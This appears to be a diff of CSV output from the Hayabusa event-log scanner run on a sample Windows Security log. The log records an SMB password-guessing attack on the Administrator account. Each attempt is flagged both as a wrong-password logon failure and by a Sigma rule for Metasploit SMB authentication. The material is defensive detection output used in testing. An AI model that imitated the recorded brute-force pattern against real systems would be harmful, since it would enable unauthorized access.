+2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GF1Q5OhCLRAi96mN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: caHe4iY2CQoiumQI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJi6UAm6Pp6eax8Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EW0t2wapD8yniO4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PnaITXTihpB0stwx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tdBVoa82WKEAW2ce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BelKzJrEjGIcU2dN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ujeb7fRHPGCGmFm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Czwt7KF2sQHemwdJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LQQ4nNpbfKKVCJZH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6jwIc6e0AHAhXKK5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nld9Job0Ll1Fgtmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q9sS6i9iU3PXhokz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: heaYv6Np8swhoVc9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I7rzgNBtUJkS93pO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gh45suNQ09FzPBjd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BOnwAGxxz994k6Ee  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L26mvUKOgGptcKaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aqldRjcLl8KFZr5h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ycNPBtmRHShPOcRA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ISlMGsVvXry0rbju  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MjGjh70EQ5YVGJUt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yaYM5N2kuvuRCHRU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 32wgj2t7BLBviVxd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vr1kMRxLEaCIWIbf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4PHEJyKgp5wXRtBk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbaoz8rTZVXUjRAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d4eD3JQ5gquIqgND  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U9slFFSSXhFxPqG1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YDb5Up4KwJj0hN5n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DxqIpDLlnf6Xyc34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rTCTTYmKTIzzJwxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oD3dLxlB3qWIhZEQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fe9xMOoCxPJIIyVq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DW3YgBZYiGTeEw66  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VAKeeIcOeiQ3H9NF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nmF3ot3gJCsBlSwF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wDjoResfZvvVqqE5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V4dwzMwvVtzztGwr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0qklApBFOMxVzucD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0IJSphtLB3eNARBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PLOFe4w5KpJ2UaGM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cF3JTWkGadY1fJE2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kyTH0jxSZB2YVdhW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NRq5XrcDkFvabCzh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zlYwlgrsMy1kSgEC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
